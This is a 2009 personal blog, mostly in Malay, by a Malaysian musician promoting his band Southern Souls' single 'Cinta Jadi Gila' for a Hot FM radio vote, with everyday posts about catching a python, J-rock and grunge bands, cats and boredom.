So nak di jadikan cerita,sesiapa yang berminat terhadap lagu tersebut bolehlah mengundi di segmen prelude Hot fm di alamat :
http://www.hotfm.com.my/hotfm_prelude.asp
peringatan!!!anda hendahlah memilih lagu Cinta jadi Gila - Southern Souls dan bukan lagu lain.hehe
jadi harap memilih dengan betul..

Dan satu lagi.Lagu tersebut juga akan mula di uploadkan di Myspace kami dan anda bolehlah mendengarnya sehingga anda muntah@ dan juga memberikan comment okey..
dan anda boleh mendengar lagu tersebut di :
http://www.myspace.com/southsoulz

Anda boleh melihat review2 terbaru kami di dalam facebook juga.Jangan lupa...

Sunday, July 19, 2009

Terperanjat Lipas....

Hari ni aku telah mendengar Hot FM radio dengan secara tidak disengajakan,tiba2 lagu band aku keluar untuk slot prelude.wahh mcm terperanjat lipas jugak,lagu yang band aku main selama nih nak jugak diorang mainkan.

Apa lagi,cepat2 aku online ingat nak vote untuk slot prelude tersebut.tapi nampaknya hari ni hampa... lagu tersebut belum lagi di-listed-kan dalam list prelude untuk hari ini.Jadi aku membuat keputusan untuk "return" lagi hari esok untuk memastikan bahawa lagu tersebut ada di dalam carta prelude Hot FM.

So kenalah tunggu untuk hari sok nampaknya.
Hari ini sangat mengecewakan tapi esok aku tetap akn meng uploadkannya di dalam Myspace.......

Thursday, July 16, 2009

Fikiran yang runsing

em..fikiran yang merunsingkan..
itu sahajalah nampaknya...

Saturday, July 11, 2009

Sabtu.11 July,Hot FM prelude.Vote for "Cinta Jadi Gila"

Macam biasalah...
Hai....

okey,hari ni ada berita penting dari segala yang penting okey.
Hari ni sabtu 10 July 2009,pukul 11pm - 12pm mesti nak kena dengar Hot FM.

Kenapa????

okey itu persoalannya kan?...

sebab lagu Southern Souls "Cinta Jadi Gila" akan ke udara di Hot Fm Prelude di Hot FM Radio bersama DJ Ikhwan pada malam ini.
so sila lah ke website Hot FM :
http://www.hotfm.com.my/hotfm_prelude.asp
untuk vote lagu dari Southern Souls "Cinta Jadi Gila"

Mungkin saya juga akan mula meng-uploadkan lagu tersebut di website Myspace Southern Souls http://www.myspace.com/southsoulz
selepas sehari dua lagu tersebut keudara di Hot Fm Radio

So... diharap anda semua dapat menyokong band ini dengan mengundi lagu tersebut
" Cinta Jadi Gila "di Hot FM prelude pada malam ini di webside rasmi Hot FM : http://www.hotfm.com.my/hotfm_prelude.asp okey...



HOT FM
Official Website

Sunday, July 5, 2009

Cinta Jadi Gila

Okey semuanya dah set.Sudah mendapat lampu hijau dan dah confirm..

Isnin ni hantar material Southern Souls dengan tema "Cinta Jadi Gila" ke KL untuk di publish.tak taulah macamana boleh "boom" atau tak.kalau menjadi memang rezeki lah nampaknya.kalau x menjadi,duduk rumah rilex2 sambil memancing arr jawabnya.haha

So hari ni aku nak tunjuk sikit gambar yang dah aku ambil tadi so boleh lah tengok2 cover dia.walaupun biasa2 je,tapi single album ni sangat bermakna sebab kali ni merupakan kali kedua Southern Souls berjuang untuk single yang terbaru nih.

so..ini adalah front cover.....

dan ini pulak adalah hiasan dalamannya okey.

Ala simple2 jelah.nak publish single buat apa nak rabak2.janji material berkualiti,orang boleh dengar sudahlah.tapi rasa2nya memang boleh dengar punyalah.muzik agak catchy,dengan senikata yang mudah di ingat dan menarik,melodi yang boleh diterima semua lapisan umur dan mendatangkan sedikit kontroversi ringan.mungkin....

Kalau ikutkan hati aku,memang nak je publish lagu tu terus dekat Southern Souls myspace.tapi adalah orang kuat-orang kuat yang aku tak boleh nak langgar dan mesti dihormati.so tengoklah macamana,dalam masa terdekat nih aku akan follow up diorang tengok macamana,boleh ke aku meng-up-loadkan lagu "Cinta Jadi Gila" ni di alam cyber nih.gambar2 pun kena sekat juga.ntahlah.hehe

em.. apa lagi eh nak cerita....

oh yeah,group dkt facebook pun dah buat.so silalah jenguk2 ye dekat facebook tuh.kalu boleh,join lah group dan biasalah haruslah support kami dengan rela hati.

So last words,supportlah Southern Souls,supportlah local muzik kita okey.

chiaoooo.....

notes : last time kita opening untuk show "Bloodshed" pun kena cross dgn concert band2 dari indon.so next time faham2 jelah ye....T.Q

Saturday, July 4, 2009

"Southern Souls" the single release

I just receive a message from my friend that southern souls single album are complete and ready to go.So my mission is to go to KL next Monday and publish it to radio's and who is related to music scene in KL.I will write about the album and publish the cover tomorrow.......

http://www.myspace.com/southsoulz

Thursday, July 2, 2009

Nasib Si Ular Sawa

Nak tidur pun tak boleh.tengok tv pun rasa bosan jek.nak tulis dkt blog pun mcm nak tak nak juga.

Ntahlah nak buat apa pun tak tau.Kalau ada member2 call boleh jugak pergi minum teh.Ni gara2 satu family pergi singapura la ni tinggal aku jaga Naqib (anak saudara) dkt rumah.Tapi satu har ni bagus pulak si Naqib nih xda buat hal,xlah kecoh sangat macam selalu buat aku sakit kepala nak layan.kadang2 sampai buat aku naik darah jek melainkan ada "wonder pets" dgn "si sponge bob" yang mampu membuat beliau duduk diam tanpa buat kecoh.

Nak di jadikan cerita,tadi masa aku tengah bosan tahap gaban,si Ipen jiran rumah aku datang tergesa2 dan mengelibas dengan memakai tuala mandi membuatkan aku memandang beliau dengan sinis.

"lu ni dah kenapa bro" tanya aku....

"cepat lincah2.ada masalah nih" kata dia

"apahal pulak kau ni dengan tuala mengelibas dalam kampung nih"...

"lincah bro,masalah nih.wa tau lu mesti suka benda nih.lu sorang je yang berani tangkap"

"tangkap apa siak... lu bebual apa nih"..biasalah ni mestilah dialog aku.

"ular sawa bro,ular sawa dkt depan tu besar bro.lincah la.xda orang berani tankap nih"

Aku pun dengan apa lagi...

Dengan gaya ala2 macam Rambo x pakai baju,terus go..... dengan ipen.Percaya atau tidak,punyalah ada budak2 macho dkt tmpt tu,boleh xda sorang pun yang bertindak.cuma sekadar tengok sambil menyuluh dengan menggunakan lampu kereta.Oh shit man.....

aku tanya dia."mana bro?"

"tu ha!!" kata si ipen

Mak ai...besar la ular sawa batik ala2 peha sey.tak terfikir la pulak nak ambil gambar time tu.tempat pulak tu dekat sebelah rumah jiran aku ada la dalam 50 meter dari rumah.yang tinggal pun separuh badan.lagi separuh dah masuh dkt celah2 pokok bunga dan kayu2 kalau tak silap sebab keadaan agak gelap dan samar-samar.

Aku apa lagi,mcm biasa dengan selamba katak tarik ekor ular tu mcm tak ada apa2 yang berlaku...

Tapi yang hairan nih,budak2 yang tengok mcm tak tau nak buat apa2,mcm panic pun ada sambil mengelitik2.kelakar jugak aku tgk.tapi ular tu memang aku tabik arr,melawan x nak mengalah.aku tarik dia,dia tarik aku balik.taknak kena tangkap la tu.

Last2 takda yang tolong,ular tu terlepas dari tangan aku sebab dia melawan.so tak dapatlah aku mengambil gambar dengan tangkapan yang unik dan jarang2 ada nih.nampaknya aku dah tewas bukan sekali,tapi dua kali sebelum ni dalam projek menangkap ular sawa sebesar peha.sebelum ni lagi basar,3 orang tarik termasuk aku,adik aku Izwan dengan sorang brader ni yang agak berani mati.

Nampaknya nasib kau baik hari ni la si ular sawa.................

Wednesday, July 1, 2009

"owh,still sarcastic you"

Time nak tidur tak boleh.time taknak tidur asyik mengantuk je.entahlah dah macam satu penyakit yang lebih seksa dari H1N1.

masa boring2 nih bila mengadap laptop sambil online tiba2 terjumpa satu perkataan english dengan nama "sarcastic" yang membuatkan aku teringat peristiwa aku ber YM dengan seseorang.bila teringat,kadang2 buat aku tersenyum sendiri.

last time dalam bulan lepas kalau tak silap,masa tengah online tiba2 ada seorang ni yang disayangi dan dah bertahun tak jumpa aku,tak contact,tiba2 tegur aku melalui YM.padahal kadang2 aku tegur la jugak dkt YM tu kalau ternampak.tapi dia buat DANG jek macam aku ni tak wujud.kesiannya gua.hehe...

dia : "hai!

aku : "hai juga"

dia : "rambut dah panjang eh"

aku yang baru lepas potong rambut dah dekat seminggu terus lah menjawab jawab dengan selamba katak ....

"tak panjang juga,baru potong rambut sikit"

dia dengan nada selamba lipas pulak......

"owh,still sarcastic you"

( sarcastic = dah macam perkataan sarkis la pulak...huhu )

Aku pun dengan pening pikiran jugak dalam kepala otak nih.em....dah kenapa si makcik ni....tiba2 jek cakap bukan2.tak pernah la seumur hidup aku ada orang complaint yang bukan2 pasal diri aku.yang ada pun dulu anak buah masa aku buat kerja engineering kata kadang2 aku ni garang jugak.hehe.dengan tak berapa pasti,aku pun search la maksud ayat tu manalah tau ada double meaning ke.atau maksud yang agak2 berbahaya.bahasa inggeris lah katakan.bukan aku pandai sangat pun macam si dia tu.mentang2 lah dia pandai english,asyik nak guna bombastic words jek.hehe..

Bila fikir2 balik,barulah aku perasan gambar yang aku letak dekat ym tu gambar masa belum potong rambut.patutlah makcik nih bilas-bilas aku semacam jek.padahal dah bertahunn tak jumpa aku.pastu adalah berbual2 2-3 potong ayat yang pelik.

aku pun dengan mcm tak ada apa2 berlaku cakap:

"xda apa pun.cakap betul jek.tak marah pun"

dan perbualan kami terhenti setakat ni je...........

walaupun aku sempat tanya keadaan dia sekarang macamana dan dia tak menjawab.

aku pun tak tau apa motif kejadian ni berlaku.

Kadang2 aku pun pelik.memang manusia memang macam ni kot ada perangai yang aneh2.tapi aku ni memang jenis yang tak kisah sangat.orang nak cakap apa pun aku biasa buat tak kisah sangat.mungkin orang tak kenal aku ni macaman.biasa apa yang aku perhatikan,banyak orang menilai manusia ni dari luaran je.ahh biar jelah.nak marah pun susah melainkan adik aku yang last ni si boboy kadang2 menggunakan tricknya buat2 tidur,demam,bangun lamabat untuk ponteng taknak pergi sekolah.macam aku nak libas je dengan tendangan maut guna dua2 kaki ni.

Otte,berbalik pada cerita tadi aku pun tak taulah nak cakap macamana lagi.mentang2 lah aku ni dah jadi anak yatim dah takda bapak.hehe.selalu bila aku cakap betul orang tak percaya.kalau nak bohong memang bukan cara aku la.budak2 kecik boleh la main tipu2.kalau menipu pulak esok lusa mesti kantoi punya.hehe

Dulu dan sekarang......

ada ke macam sama?

memangla aku orang yang sama.x payah la nak buat kelakar pulak.

tapi bila tengok masa rambut panjang tu mcm lagi ala2 j-rock gitu.aku pun tengah macam nak bela rambut panjang balik nih walaupun rasa rimas.kalau nak buat rambut dread lock macam adik aku yang kononnya ala2 reggea tu lagi lah x kuasa.

tapi apa-apa pun,akau lapar nih.mcm ter amat kebulur sehh.nak makan dulu......

da da....

notes : rambut panjang kena sindir2.pendek pun ken sindir2.kalau botak mungkin orang sayang kot.huhu.....

Tuesday, June 30, 2009

Sesangat la keji...

Owh.. tiba2 semangat wa kembali membara bila terbaca satu..em dua dan lebih blog post dari sorang ni lah yang mcm mengajak wa berperang blog post dgn dia...

nak kata member em.. member la jugak.gaduh pun tak.tapi dia memang suka ajak wa berperang.tak kira la dari guna YM,SMS dan sekarang menggunakan blog peribadi dia pulak.

em..memang sangat keji lah.....

tapi dia ni memang berani arr membuat statement2 maut melalui tajuk2 blog dan ayat2 yang mengajak wa ber kung-fu dengan dia.kalau depan mata dah lama wa sekeh2 dan tarik2 rambut dia nih.hehe

nak ajak wa main kasar kan??

siap lu makcik.....hehehe

p/s : kalau tau kelmarin wa stay KL lama sikit.silap la wa tak lunch dgn lu.kalau tak,tau lah mcmana wa nak grip leher lu....huhu

Murung...

Nak tulis apa pun tak tau..

nak cakap apa2 pun takda mood...

entahlah kenapa sejak akhir2 ni.

ke hulu hilir,naik turun KL,

tapi apa2 project pun tak jadi.

em...memang bulan yang sangat murung dan memboringkan....

Thursday, June 4, 2009

L'Arc-en-Ciel

L'Arc en-Ciel is one of the biggest band in j-rock music genre that i love most other than Judy and Mary,Shingo,Glay and many others.to me, this j-rock super band creates high composing music with outstanding instruments playing ability's that blend modern rock style ,jazz and souls with passions always makes me to pick up my bass guitar and start play along with their musics.

i dont know y i fall in love with this "j-rock" things.LOL!
maybe it its gauge between Brits and Americans style of music are very different and its like an experiment to me playing this type of music style..
maybe if u know music..if u know how to judge,u would say this band always produce "outstanding and expensive music"...maybe.maybe i'm a passion guy with wrong judgment hehe....

"stay away" and "drivers high" is the proof if u understand what im trying to say......



Tuesday, June 2, 2009

Girl Friday....

the "Malaysian super grunge"band or been called "the godfather of nirvana",
butterfingers reminds me of the old times underground scenes ever..
i don't know what other people think about this band
to me its full of inspirations and passions that always makes grunge music still alive until today.
"GUNGE" will never die......lol....

from the second album"butterworth pushful" this son called "girl friday"



Girl Friday

Ain't that hard to live alone
ain't that far to be from home
cause gravity can never pull me... down..

calculate the days i've spent
procrastinating god knows when..
grow in silence feverish of... flu...
and again it's me, myself and I.....

fall on me
stand aside trying to keep my cool!..
stand in line feeling like a fool
it's getting late now get back in your.... bed
then remembered as what my daddy said....
what'cha gonna be?
u can also get the tablature here:

http://www.ultimate-guitar.com/tabs/b/butterfingers/girl_friday_tab.htm
http://www.music-lyrics-chord.com/Butterfingers/Chords/13184-Girl_Friday_Chords.html

Tuesday, May 26, 2009

kucing pun mandi


hari ni mandikan kucing 2 ekor.kiki (kuning putih jenis parsi) dan tobby (warna hitam jenis British short hair).siap gunakan syampoo pantene lagi.

haha padan muka diorang.. ehh padan muka aku kena madikan diorang.

apa la nasib..dah tanggungjawab..

Beli Pay Pal

humm....saya sgt memerlukan pay pal sekarang nih.

leceh betul lah.
kalau ada sesiapa yg ingin menukar pay pal mereka dgn saya silalah mail saya okey..
bladefingers1@yahoo.com
rate dalam 2.9 - 3.2 bolehlah.hehe

Sunday, May 17, 2009

Makan Tidur Muzik

hum...
lately xda apa nak buat.makan,tidur dan muzik.hei boringny.....
nak pergi tgk movies tapi xda geng.xpalah just go sorang2 jelah...
huuuuu hari yg sgt memboringkan.....

Friday, February 13, 2009

HarmonyCentral.com

harmonycentral.com

salah satu website yg dah banyak ajar aku dari masa sekolah lagi....

tiba2 teringat pulak masa sekolah2 dulu kemaruk ambil tab(tablature) dari harmonycentral.com sebelum jamming.nak lagu apa search je.dari lyrics,bass sampai ke guitar pun boleh dapat.

walaupun sekarang dah dah tak perlu ambil tab dari site ni,tapi sekali sekala aku jenguk2 la juga site yg dah banyak berjasa nih....

harap2 banyak lagi ogg yg dapa manfaat dari site ni....

Thanks Harmony central...

Monday, January 5, 2009

Makan Tidur Muzik 1st post

Testing..testing 123...

so this is my first post for this blog.

hehe......